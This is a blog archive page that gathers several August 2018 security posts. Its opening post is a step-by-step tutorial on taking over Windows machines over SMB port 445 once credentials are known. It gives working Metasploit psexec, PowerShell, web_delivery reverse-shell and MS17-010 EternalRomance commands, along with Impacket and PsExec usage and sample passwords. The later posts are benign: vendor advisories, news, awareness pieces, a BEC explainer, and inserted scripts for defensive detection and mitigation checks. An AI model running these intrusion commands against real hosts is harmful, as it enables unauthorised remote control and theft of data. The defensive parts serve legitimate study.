Monthly Archives: August 2018

Multiple ways to Connect Remote PC using SMB Port

In this article, we will learn how to connect to a victim's machine via SMB port 445 once you have collected a username and password for that PC. To learn how to collect usernames and passwords from a remote host over the SMB protocol, click here, and to understand what the SMB protocol is, click here.

Table of contents

Exploiting Windows Server 2008 R2 via SMB through Metasploit inbuilt exploits:

  • Microsoft Windows Authenticated User Code Execution
  • Microsoft Windows Authenticated Powershell Command Execution
  • Microsoft Windows Authenticated Administration Utility
  • SMB Impacket WMI Exec

Third party Tools

  • Impacket (psexec)
  • Impacket (atexec)
  • Psexec exe
  • Atelier Web Remote Commander

Exploiting Windows 2007 via SMB through Metasploit inbuilt exploits:

  • MS17-010 EternalRomance SMB Remote code execution
  • MS17-010 EternalRomance SMB Remote command execution

Let’s Begin

Tested on: Windows Server 2008 R2

Attacking Machine: Kali Linux

Microsoft Windows Authenticated User Code Execution

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.

msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass Ignite@123
msf exploit(windows/smb/psexec) > exploit


rhost –> IP of victim PC

smbuser –> username

smbpass –> password

Once the commands run you will gain a meterpreter session of your victim’s PC and so you can access it as you want.

Microsoft Windows Authenticated Powershell Command Execution

This module uses a valid administrator username and password to execute a PowerShell payload using a technique similar to the "psexec" utility provided by SysInternals. The payload is base64-encoded and executed from the command line using the -EncodedCommand flag. Using this method, the payload is never written to disk, and since each payload is unique, it is less prone to signature-based detection. A persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a PowerShell invocation which hides the window entirely.

msf > use exploit/windows/smb/psexec_psh
msf exploit(windows/smb/psexec_psh) > set rhost
msf exploit(windows/smb/psexec_psh) > set smbuser administrator
msf exploit(windows/smb/psexec_psh) > set smbpass Ignite@123
msf exploit(windows/smb/psexec_psh) > exploit

Once again, as the commands run you will gain a meterpreter session on the victim's PC, and from there you can do as you wish.

Microsoft Windows Authenticated Administration Utility

This module uses a valid administrator username and password to execute an arbitrary command on one or more hosts, using a technique similar to the "psexec" utility provided by SysInternals. Daisy chaining commands with '&' does not work and users shouldn't try it. This module is useful because it doesn't need to upload any binaries to the target machine.

So first, in a new Metasploit console, we use the web_delivery module to generate the malicious dll code, which we will then pass as the arbitrary command to run on the host.

use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost
msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text (the malicious dll code).

msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set rhosts
msf auxiliary(admin/smb/psexec_command) > set smbuser administrator
msf auxiliary(admin/smb/psexec_command) > set smbpass Ignite@123
msf auxiliary(admin/smb/psexec_command) > set COMMAND [Paste above copied dll code here]
msf auxiliary(admin/smb/psexec_command) > exploit

As soon as we run the psexec auxiliary module, we get a meterpreter session as administrator.

SMB Impacket WMI Exec

This module takes a similar approach to psexec but executes commands through WMI.

msf > use auxiliary/scanner/smb/impacket/wmiexec
msf auxiliary(scanner/smb/impacket/wmiexec) > set rhosts
msf auxiliary(scanner/smb/impacket/wmiexec) > set smbuser administrator
msf auxiliary(scanner/smb/impacket/wmiexec) > set smbpass Ignite@123
msf auxiliary(scanner/smb/impacket/wmiexec) > set COMMAND systeminfo
msf auxiliary(scanner/smb/impacket/wmiexec) > exploit

Impacket (psexec)

This Impacket script lets you execute processes on remote Windows systems, copy files to them, process their output and stream it back. It allows execution of remote shell commands directly, with a full interactive console, without having to install any client software.

Now let's install the Impacket tools from GitHub. You can get them from here. First clone the repository, then install Impacket, then run the script to connect to the victim's machine.

git clone
cd impacket/
python setup.py install
cd examples

Syntax: ./ [[domain/] username [: password] @] [Target IP Address]

./ SERVER/Administrator:Ignite@

Impacket (atexec)

This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

Syntax: / [[domain/] username [: password] @] [Target IP Address] [Command]

./ SERVER/Administrator:Ignite123@ systeminfo

As you can see below, a remote connection was established to the server, the command systeminfo was run on the target server, and the output of the command was delivered to the Kali terminal.


PsExec.exe

PsExec.exe is software that helps us access other computers on a network. This software takes us directly to the shell of the remote PC, with the advantage that nothing has to be done manually. Download this software from –>

Unzip the file once you have downloaded it. Go to your command prompt and type:

PsExec.exe\\ -u administrator -p Ignite@123 cmd

Here, \\ is followed by the IP of the remote host

-u –> denotes username

-p –> denotes password

cmd –> to enter victim’s command prompt
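Every technique on this page so far leaves host telemetry: the psexec module creates a service "with a randomly chosen name and description" (Sysinternals PsExec installs one named PSEXESVC), psexec_psh runs a base64 -EncodedCommand inside a hidden PowerShell window, and wmiexec executes commands through WMI, which on the target means WmiPrvSE.exe spawning a shell. The script below is an added example of defender-side triage over such events; it is not from the original post, Metasploit, Impacket or Sysinternals. The event dicts, host names and field names (EventID, ServiceName, ImagePath, Image, ParentImage, CommandLine) are constructed assumptions about how a SIEM normalises Sysmon and System-log records, and the entropy threshold is a heuristic, not a documented constant.

```python
"""Triage heuristics for psexec / psexec_psh / wmiexec-style remote execution.
Input is a list of already-parsed Windows events (constructed samples below)."""
import base64
import math
import re
from collections import Counter

# Binary dropped directly in the Windows directory (what the ADMIN$ share maps to).
# Services shipped with the OS live under System32, so this alone separates them.
WINDIR_ROOT_EXE = re.compile(
    r"^(?:%SystemRoot%|\\\\[^\\]+\\ADMIN\$|[A-Za-z]:\\Windows)\\[^\\]+\.exe$", re.I)


def shannon_entropy(s):
    """Bits per character; an 8-letter name with no repeats scores exactly 3.0."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def _is_prefix_flag(token, full):
    """PowerShell accepts any unambiguous prefix: -e, -enc and -EncodedCommand all work."""
    return len(token) > 1 and token[0] in "-/" and full.startswith(token[1:].lower())


def decode_encoded_command(b64):
    """-EncodedCommand carries the script as base64 over UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le", "replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def check_service_install(ev):
    """System log event 7045: a new service was installed."""
    if ev.get("EventID") != 7045:
        return None
    name, path = ev.get("ServiceName", ""), ev.get("ImagePath", "")
    if name.upper() == "PSEXESVC":
        return ("psexec_service", f"Sysinternals PsExec service installed from {path}")
    if WINDIR_ROOT_EXE.match(path) and len(name) >= 8 and shannon_entropy(name) >= 3.0:
        return ("random_service", f"high-entropy service {name!r} with binary {path}")
    return None


def check_process_create(ev):
    """Sysmon event 1 / Security event 4688: process creation."""
    if ev.get("EventID") not in (1, 4688):
        return None
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    tokens = ev.get("CommandLine", "").split()
    if image.endswith("powershell.exe"):
        hidden = any(_is_prefix_flag(t, "windowstyle") and n.lower() == "hidden"
                     for t, n in zip(tokens, tokens[1:]))
        for flag, arg in zip(tokens, tokens[1:]):
            if _is_prefix_flag(flag, "encodedcommand"):
                script = decode_encoded_command(arg)
                return ("encoded_powershell", f"hidden={hidden} script={script[:60]!r}")
    if parent.endswith("wmiprvse.exe") and image.endswith(("cmd.exe", "powershell.exe")):
        return ("wmi_shell", f"WmiPrvSE.exe spawned {image} (wmiexec-style execution)")
    return None


def detect(events):
    """Run every rule over every event; return one finding dict per hit."""
    findings = []
    for ev in events:
        hit = check_service_install(ev) or check_process_create(ev)
        if hit:
            findings.append({"host": ev.get("Computer", "?"), "rule": hit[0], "detail": hit[1]})
    return findings


# Constructed stand-in for an encoded payload (the page's payload is not reproduced here).
_PSH_B64 = base64.b64encode("Write-Host hi".encode("utf-16le")).decode()

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"EventID": 7045, "Computer": "SRV01", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 7045, "Computer": "SRV01", "ServiceName": "QkLmXvRw",
     "ImagePath": r"%SystemRoot%\QkLmXvRw.exe"},
    {"EventID": 7045, "Computer": "SRV01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 1, "Computer": "SRV01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -e {_PSH_B64}"},
    {"EventID": 1, "Computer": "SRV01", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /Q /c systeminfo 1> \\127.0.0.1\ADMIN$\__1535700000.1 2>&1"},
    {"EventID": 1, "Computer": "WS07", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['rule']}: {f['detail']}")
```

The benign Spooler service and the signed inventory script produce no findings; the four hits are the random-name service, PSEXESVC, the hidden encoded PowerShell (with the decoded script in the detail, which is what an analyst wants to read first) and the shell spawned under WmiPrvSE.exe. Tune the entropy threshold against your own service inventory before alerting on it.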

Atelier Web Remote Commander

This is graphical software that lets us gain control of the victim's PC quite easily.

Once you have opened the software, enter the IP address of the victim's PC in the remote host box, along with the username and password in their respective boxes. Then click Connect; the victim's whole screen will appear on your desktop and you will have a good view of what the victim is doing.

As you can observe, we have the screen of the victim's machine in front of us.

MS17-010 EternalRomance SMB Remote code Execution

Tested on: Windows 2007 Ultimate

Attacking Machine: Kali Linux

This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.

msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost
msf exploit(windows/smb/ms17_010_psexec) > set smbuser raj
msf exploit(windows/smb/ms17_010_psexec) > set smbpass 123
msf exploit(windows/smb/ms17_010_psexec) > exploit

MS17-010 EternalRomance SMB Remote Command Execution

This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.

So first, in a new Metasploit console, we use the web_delivery module to generate the malicious dll code, which we will then pass as the arbitrary command to run on the host.

use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost
msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text (the malicious dll code).

msf > use auxiliary/admin/smb/ms17_010_command
msf auxiliary(admin/smb/ms17_010_command) > set rhosts
msf auxiliary(admin/smb/ms17_010_command) > set smbuser raj
msf auxiliary(admin/smb/ms17_010_command) > set smbpass 123
msf auxiliary(admin/smb/ms17_010_command) > set COMMAND [Paste above copied dll code here]
msf auxiliary(admin/smb/ms17_010_command) > exploit

As soon as we run the auxiliary module, we get a meterpreter session as administrator.

In this way we can compromise a victim's machine remotely if we have login credentials.

Happy Hacking!!!!

Author: Yashika Dhir is a passionate researcher and technical writer at Hacking Articles. She is a hacking enthusiast.


NBlog September 1 – outsider threat awareness module published

If “insiders” are defined as the organization’s employees, “outsiders” must be everyone else, right, all those who are not on the payroll?  In reality from any single organization’s perspective, a huge variety and number of people qualify as outsiders. 
‘We’ are completely outnumbered by ‘them’.
Leading on from August’s awareness coverage of insider threats, it’s time now to explore the information-related threats from outside the organization – both threatening outsiders and external threats that don’t involve malicious people, or indeed people, at all.
The scope of September's NoticeBored security awareness and training module includes external events, incidents, accidents and challenges that aren’t deliberate, targeted attacks by specific people or groups – supply chain interruptions, cloud service failures and Internet drop-outs for example are external threats to the business, as are more general, widespread or social issues such as climate change, infectious disease outbreaks and natural disasters.  We call these “outside threats”.
For completeness, the threats and risks arising from “inbetweenies” – neither insiders nor outsiders - were mentioned last month and are brought up again this month.  We’re talking about contractors, consultants, professional advisors, interns, temps and others.  Perhaps at some future point we should explore the inbetweeny threats in more depth.
By the way, the A-to-Z guide to outsider threats turned out to be 12 pages as predicted. It was a bit of a rush to prepare such a detailed awareness paper at the end of the month but I'm glad we did; I'm still thinking about offering it as a threat catalog to guide anyone trying to identify and understand their outsider threats.  Google finds a number of threat catalogs already but none I have found so far cover "outsider threats" as well as ours does. But then I wrote it, so I'm biased. I should probably let it cool off for a while, and maybe I should add "insider threats" as well to complete the set.

80 Percent of U.S. Adults Have Never Considered a Career in Cybersecurity

Don’t know what a penetration tester is? You’re not alone; more than 50 percent of U.S. adults surveyed by the University of Phoenix have never heard of pen testers or “White Hat” ethical hackers, among other cybersecurity job titles, and only about one in 10 survey respondents is “very familiar” with the 11 jobs in the industry queried in the survey.

CPU Side-Channel Information Disclosure Vulnerabilities: August 2018

On August 14th, 2018, three vulnerabilities were disclosed by Intel and security researchers that leverage a speculative execution side-channel method referred to as L1 Terminal Fault (L1TF) that affects modern Intel microprocessors. These vulnerabilities could allow an unprivileged, local attacker, in specific circumstances, to read privileged memory belonging to other processes.

The first vulnerability, CVE-2018-3615, affects Intel SGX technology and is referred to by the researchers who discovered it as foreshadow. This vulnerability is not known to affect any Cisco devices as the Cisco devices do not utilize Intel SGX technology.

The second vulnerability, CVE-2018-3620, and the third vulnerability, CVE-2018-3646, are referred to as L1 Terminal Fault attacks by Intel. These two vulnerabilities affect multi-core processors that leverage Intel Hyper-Threading technology supporting Operating System, System Management Mode, and Virtualized workloads. Like the previously disclosed Spectre vulnerabilities, all three new vulnerabilities leverage cache-timing attacks to infer any disclosed data.

To exploit any of these vulnerabilities, an attacker must be able to run crafted or script code on an affected device. Although the underlying CPU and operating system combination in a product or service may be affected by these vulnerabilities, the majority of Cisco products are closed systems that do not allow customers to run custom code and are, therefore, not vulnerable. There is no vector from which to exploit them. Cisco products are considered potentially vulnerable only if they allow customers to execute custom code side-by-side with Cisco code on the same microprocessor.

A Cisco product that may be deployed as a virtual machine or a container, even while not directly affected by any of these vulnerabilities, could be targeted by such attacks if the hosting environment is vulnerable. Cisco recommends that customers harden their virtual environments, tightly control user access, and ensure that all security updates are installed. Customers who are deploying products as a virtual device in multi-tenant hosting environments should ensure that the underlying hardware, as well as the operating system or hypervisor, is patched against the vulnerabilities in question.

Although Cisco cloud services are not directly affected by these vulnerabilities, the infrastructure on which they run may be impacted. See the Affected Products section of this advisory for information about the impact of these vulnerabilities on Cisco cloud services.

Cisco will release software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.

This advisory is available at the following link:

Security Impact Rating: Medium
CVE: CVE-2018-3615,CVE-2018-3620,CVE-2018-3646

CPU Side-Channel Information Disclosure Vulnerabilities: May 2018

On May 21, 2018, researchers disclosed two vulnerabilities that take advantage of the implementation of speculative execution of instructions on many modern microprocessor architectures to perform side-channel information disclosure attacks. These vulnerabilities could allow an unprivileged, local attacker, in specific circumstances, to read privileged memory belonging to other processes.

The first vulnerability, CVE-2018-3639, is known as Spectre Variant 4 or SpectreNG. The second vulnerability, CVE-2018-3640, is known as Spectre Variant 3a. Both of these attacks are variants of the attacks disclosed in January 2018 and leverage cache-timing attacks to infer any disclosed data.

To exploit either of these vulnerabilities, an attacker must be able to run crafted or script code on an affected device. Although the underlying CPU and operating system combination in a product or service may be affected by these vulnerabilities, the majority of Cisco products are closed systems that do not allow customers to run custom code and are, therefore, not vulnerable. There is no vector to exploit them. Cisco products are considered potentially vulnerable only if they allow customers to execute custom code side-by-side with Cisco code on the same microprocessor.

A Cisco product that may be deployed as a virtual machine or a container, even while not directly affected by any of these vulnerabilities, could be targeted by such attacks if the hosting environment is vulnerable. Cisco recommends that customers harden their virtual environments, tightly control user access, and ensure that all security updates are installed. Customers who are deploying products as a virtual device in multi-tenant hosting environments should ensure that the underlying hardware, as well as operating system or hypervisor, is patched against the vulnerabilities in question.

Although Cisco cloud services are not directly affected by these vulnerabilities, the infrastructure on which they run may be impacted. Refer to the “Affected Products” section of this advisory for information about the impact of these vulnerabilities on Cisco cloud services. 

Cisco will release software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.

This advisory is available at the following link:

Security Impact Rating: Medium
CVE: CVE-2018-3639,CVE-2018-3640
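Both advisories tell customers running Cisco images as VMs or containers to make sure the underlying hypervisor is patched. On a Linux host the kernel reports its own view of each issue under /sys/devices/system/cpu/vulnerabilities/, and for L1TF the status line says explicitly whether Hyper-Threading (SMT) still leaves a sibling thread exposed, which is the multi-tenant case the advisories single out. The script below is an added example, not part of either Cisco advisory; the sample status strings are constructed in the format those files use, and the mapping of CVE to file name is mine. Variant 3a (CVE-2018-3640) is a microcode fix with no sysfs entry and is not checked here.

```python
"""Report the kernel's mitigation status for L1TF (CVE-2018-3620/3646) and
Spectre Variant 4 (CVE-2018-3639) on a Linux host or hypervisor."""
from pathlib import Path

SYSFS_DIR = Path("/sys/devices/system/cpu/vulnerabilities")

# CVE -> sysfs file that carries the kernel's status for it (assumed mapping).
CVE_TO_SYSFS = {
    "CVE-2018-3620": "l1tf",
    "CVE-2018-3646": "l1tf",
    "CVE-2018-3639": "spec_store_bypass",
}


def classify(status):
    """Map one status line to ok / mitigated / partial / vulnerable / unknown."""
    s = status.strip()
    if s == "Not affected":
        return "ok"
    if s.startswith("Mitigation:"):
        # For L1TF the kernel appends "SMT vulnerable" when Hyper-Threading is still
        # enabled: a guest on the sibling thread can still read the shared L1 cache,
        # so the host is only partially mitigated for multi-tenant use.
        return "partial" if "SMT vulnerable" in s else "mitigated"
    if s.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"


def read_sysfs(name):
    return (SYSFS_DIR / name).read_text()


def assess(read=read_sysfs):
    """Return {cve: {sysfs, status, state}}; `read` is injectable for offline use."""
    report = {}
    for cve, name in CVE_TO_SYSFS.items():
        try:
            status = read(name).strip()
        except (OSError, KeyError):
            status = ""  # kernel predates the entry, or this is not Linux
        report[cve] = {"sysfs": name, "status": status,
                       "state": classify(status) if status else "unknown"}
    return report


def needs_action(report):
    """CVEs an operator still has to deal with before hosting untrusted tenants."""
    return sorted(c for c, r in report.items()
                  if r["state"] in ("partial", "vulnerable", "unknown"))


# Constructed sample: a patched kernel on a hypervisor that still has SMT enabled
# and no Speculative Store Bypass mitigation available.
SAMPLE_STATUS = {
    "l1tf": "Mitigation: PTE Inversion; VMX: conditional cache flushes, SMT vulnerable\n",
    "spec_store_bypass": "Vulnerable\n",
}

if __name__ == "__main__":
    for cve, r in assess().items():
        print(f"{cve}: {r['state']:<10} {r['status'] or '(no sysfs entry)'}")
```

Run without arguments it reads the live sysfs files; "unknown" for every CVE means the kernel is too old to even report, which is itself a finding. Treat "partial" on l1tf as vulnerable if untrusted guests share the host.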

CA Unified Infrastructure Management Hardcoded Credentials / Missing Authentication

CA Technologies Support is alerting customers to multiple potential risks with CA Unified Infrastructure Management. Multiple vulnerabilities exist that can allow an attacker, who has access to the network on which CA UIM is running, to run arbitrary CA UIM commands on machines where the CA UIM probes are running. An attacker can also gain access to other machines running CA UIM and access the filesystems of those machines. The first vulnerability has a medium risk rating and concerns a hardcoded secret key, which can allow an attacker to access sensitive information. The second vulnerability has a medium risk rating and concerns a hardcoded passphrase, which can allow an attacker to access sensitive information. The third vulnerability has a high risk rating and concerns a lack of authentication, which can allow a remote attacker to conduct a variety of attacks, including file reading/writing. Affected versions include 8.5.1, 8.5, and 8.4.7.

Seamless Security for the Connected Consumer

Laptops, mobile phones, tablets, smart watches, and more are all often found in a modern user’s arsenal of personal devices. We rely on these devices for so many things – to wake us up, count calories, connect us to friends and loved ones, provide access to the web, the list goes on. We love our devices, that much is clear. But this love has almost become bittersweet due to growing concerns about how using these devices impact our privacy.

Not so long ago, cybersecurity was a distant idea for many of us. But big-name data breaches and attacks changed all of that. Dyn, WannaCry, and Equifax soon became household names, causing us to consider how we use connected devices, what exactly we connect to, and who we share their information with. As Kelly Sheridan, a reporter at Dark Reading, states “A few years ago, many people didn’t talk about cybersecurity or even pay much attention to it. These days, it’s a growing source of stress among consumers, who rely on several devices and businesses to protect their data.” Now, with cybersecurity making all of us anxious, the next question is, how can we enjoy the convenience of our personal devices while still remaining secure?

Staying connected doesn’t have to be a bittersweet experience. In fact, we can do a lot to empower ourselves and become security savvy. To remain protected anywhere we are connected, we can look to McAfee for a seamless, simple yet powerful security experience.

McAfee aims to make it easy for everyone to protect what matters most. We understand the complexity of managing multiple devices in our already busy lives. We understand that the last thing users need is a complex product for securing devices. Our focus at McAfee is to simplify digital protection by providing a seamless unified experience. So, whether you are at home or out and about, McAfee protects your identity, your data, and your devices, all with the same delightful, unified user experience powered by McAfee's cloud. Our goal is to create an effortless onboarding experience and make it quick and easy to set up digital security for you and your entire family. Plus, you can manage it all from a simple mobile app, so you can get notified when a new threat is discovered and receive tips for staying protected.

Now, you can rest assured that your identity and your digital privacy are protected with security that is effective, simple and meaningful. You will be able to use your devices anywhere and stay protected against any threat, on any network. With this approach, living a connected lifestyle no longer has to be bittersweet.

To learn more about consumer security and our approach to it, be sure to follow us at @McAfee and @McAfee_Home.


Threat Roundup for August 24-31

Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Aug. 24 and 31. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, or

The most prevalent threats highlighted in this roundup are:


Senate Commerce Committee Members Rumored to be Discussing Online Privacy Bill

On August 29, 2018, Bloomberg Law reported that four Senate Commerce Committee members are discussing a potential online privacy bill. The bipartisan group consists of Senators Jerry Moran (R-KS), Roger Wicker (R-MS), Richard Blumenthal (D-CT) and Brian Schatz (D-HI), according to anonymous Senate aides.

Specific details of the possible bill are unknown. The proposal may compete with a bill being developed by Senate Commerce Committee Chairman John Thune (R-SD), and is a further indication of increased Congressional interest in enacting a broad online privacy bill. Such interest sharpened in a year of increased scrutiny and legal developments in the privacy arena, including the European Union’s General Data Protection Regulation and the recently enacted California Consumer Privacy Act of 2018.

Alongside these reported Congressional efforts, the Trump Administration, through the National Economic Council and the Commerce Department, is said to be developing an online privacy proposal to send to Congress.

Firefox to auto-block ad trackers

Mozilla this week said that its Firefox browser will soon start to automatically block some ad tracking technologies that the company claimed impact page load performance and shadow users wherever they go.

"In the near future, Firefox will — by default — protect users by blocking tracking," wrote Nick Nguyen, Mozilla's top Firefox executive, in an August 30 post to a company blog.

Mozilla added what it dubbed "Tracking Protection" to Firefox 57, a.k.a. "Quantum," last fall. Since then, the feature has remained opt-in, meaning people must manually enable it from the browser's Preferences display if they want to use it. When switched on, Tracking Protection blocks a wide range of content, not just advertisements but also in-page trackers that sites or ad networks implant to follow users from one website to another. Such trackers are the reason why an ad for underwear from a specific vendor seemingly pops up wherever one goes after one has browsed the underwear selection at the seller's website.


The Economic Growth, Regulatory Relief and Consumer Protection Act: What Parents Should Know

When we think about credit cards, we usually think of our own – what we use them for, how our credit is doing, and most importantly, that they remain in our hands and not in that of a cybercriminal. But something many parents forget – the cyberthreats that could potentially impact our financial information could very well impact our children’s, given they have credit cards of their own. As a matter of fact, there’s a new law that helps parents with exactly that – protecting their kids’ credit, amongst a few other things. It’s called the Economic Growth, Regulatory Relief and Consumer Protection Act, and it takes effect on September 21st of this year.

So, what does this law mean for parents and their kids? With this law, free credit freezes will be available for anyone – including children under the age of 16 – in the country (currently, there may be fees depending on state laws). That way, if a cybercriminal tries to open up an account with a minor’s information, the impacted family can freeze that account immediately. Additionally, it will extend fraud alerts from 90 days to a full year.

As a result of this law, Equifax, Experian, and TransUnion will each set up a web page for requesting fraud alerts and credit freezes. The FTC will also post links to those web pages on

So, with this law coming into effect in no time, what next steps should parents take to reap its benefits? Start by following these tips:

  • Find out if your child has a credit report. First and foremost, head here and go to the ‘Child Identity Theft’ section. It will have instructions on how to find out if your child has a credit report. Most young children shouldn’t have credit files, but if they do, the page includes contact information for credit agencies and advice on how to freeze credit.
  • Keep the record of freezes in a safe place. If you do have to freeze a credit report, keep the records stored in a safe place. Make sure your family can find it when needed, and a crook can’t access it.
  • Invest in an identity theft monitoring and recovery solution. The best way to protect you or a family member from identity theft is by being proactive. That’s precisely why you should leverage a solution tool such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.


BEC is Big Business for Hackers: What makes these attacks so hard to prevent?

For years, one of the most lucrative ways for hackers to generate profits was through ransomware attacks. These instances involve the use of strong encryption to lock victims out of their files and data – attackers then sell the decryption key in exchange for an untraceable Bitcoin ransom payment.

Now, however, another highly profitable attack style is emerging, particularly within the enterprise sector.

Business Email Compromise, or BEC, is creating considerable opportunities for cybercriminals to make money off of their malicious activity, and the sophistication and urgency of these infiltrations make them particularly difficult to guard against.

The rise of BEC

Although organizations are now becoming increasingly aware of the BEC attack approach, this strategy has actually been generating income for hackers for years now. Trend Micro researchers reported that, in 2016, attackers generated an average of $140,000 in losses by launching BEC attacks on businesses across the globe.

In the past, BEC was known as a “man-in-the-email” scam, in which hackers leverage legitimate-looking emails to support bogus wire transfers from enterprise victims. As Trend Micro researchers pointed out, these attacks can come in an array of different styles, including fraudulent invoices, attacks on the company CEO, account compromise or impersonation, and even traditional data theft.

Judging by the level of profit hackers have been able to generate, supported by the successful attacks they’ve been able to pull off, chances are good that BEC will only continue its rise in the near future.

How big of a business is BEC?

Whereas hackers caused an average of $140,000 in business losses two years ago, cybercriminals who leverage BEC schemes have been able to increase their potential for profit since then.

In July 2018, the FBI's Internet Crime Complaint Center reported a 136 percent rise in losses related to BEC attacks, specifically between December 2016 and May 2018. Overall, this means hackers have raked in a total of $12.5 billion in company BEC losses, spanning both international and domestic attacks. The sheer amount of loss – and profit on the side of hackers – is $3 billion higher than the prediction Trend Micro researchers made in our Paradigm Shifts: Security Predictions for 2018 report.

Fueling BEC: What makes these attacks difficult to guard against?

An increase in successful attacks translates to a rise in profits on the part of hackers, and a larger number of affected business victims. In this landscape, it's imperative that enterprise decision-makers and IT stakeholders not only understand that these attacks are taking place, but also boost their awareness of the challenges in protecting against them. In this way, businesses can take proactive action to better protect their email systems, critical data, finances and other assets.

Let’s examine a few of the factors that contribute to the difficulties in protecting against BEC attacks:

Sophisticated use of social engineering

In the instances of BEC, hackers don’t just craft a catch-all email with common language and hope it dupes their target. Instead, they take their time to complete sophisticated social engineering. In this way, they are able to use an attack style that will boost their chances of the target opening and responding to the message.

Specially-crafted email

Thanks to the robust social engineering involved, cybercriminals can create incredibly legitimate-looking emails that include targets’ names, and can even appear to be from others within the organization. For example, an accountant may receive a fraudulent email request for a wire transfer from the company CEO, which includes a spoofed version of the CEO’s email address and even the CEO’s own email signature. Accordingly, he or she will be more likely to send the funds, because the email appears very real.

Lack of malicious links or attachments

While hackers’ background and foundational effort is in-depth and sophisticated, the process of delivery is surprisingly simple. BEC attacks rely on a convincing email with a strong message, meaning that the normal red flags used to identify a potential attack are lacking.

“Because these scams do not have any malicious links or attachments, they can evade traditional solutions,” Trend Micro pointed out.

Sense of urgency in the message

In addition to leveraging social engineering to include legitimate names, addresses and other details to fool victims, hackers also include a strong sense of urgency in BEC messages to encourage a successful attack. Many messages analyzed by Trend Micro researchers were found to include powerful language like “urgent,” “payment,” “transfer,” “request,” and other words that can support the overall message.

“The sense of urgency, a request for action, or a financial implication used in BEC schemes tricks targets into falling for the trap,” Trend Micro explained. “For instance, a cybercriminal contacts either the employees and/or executives of the company and poses as either third-party suppliers, representatives of law firms or even chief executive officers (CEOs), manipulating the targeted employee/executive into secretly handling the transfer of funds.”

Business Email Compromise attacks involve social engineering and strong language.

Array of different styles to appeal to different victims

In addition, the fact that attackers have established a wide variety of different attack styles means they can utilize the one that will be most successful with their target, based on their social engineering research. For instance, a hacker who wants to attack a company CEO could pose as a third-party vendor requiring payment for an overdue invoice. An attacker looking to launch an attack on a company that may not commonly use outside vendors, and thus may not fall for that approach, could pose as an internal HR employee needing personally identifiable data.

With so many different styles available, hackers have a veritable playbook to choose from and can craft the most legitimate message which will support the chances of successful fraud and attack.

Further leveraging a compromised account: Continuing the cycle

Finally, and unfortunately, the BEC cycle doesn’t have to end after a fraudulent wire transfer has been made by the victim. Once an account has been compromised, it can be leveraged to support further BEC schemes, sending phishing or other BEC messages to others within the compromised account address book.

Hackers are also positioning victims as “money mules,” according to the FBI IC3’s report. These are victims, recruited through romance or blackmail scams, whom hackers use to open new accounts to leverage for BEC. While these accounts may only remain open for a short time, they provide additional, malicious opportunities for attackers.

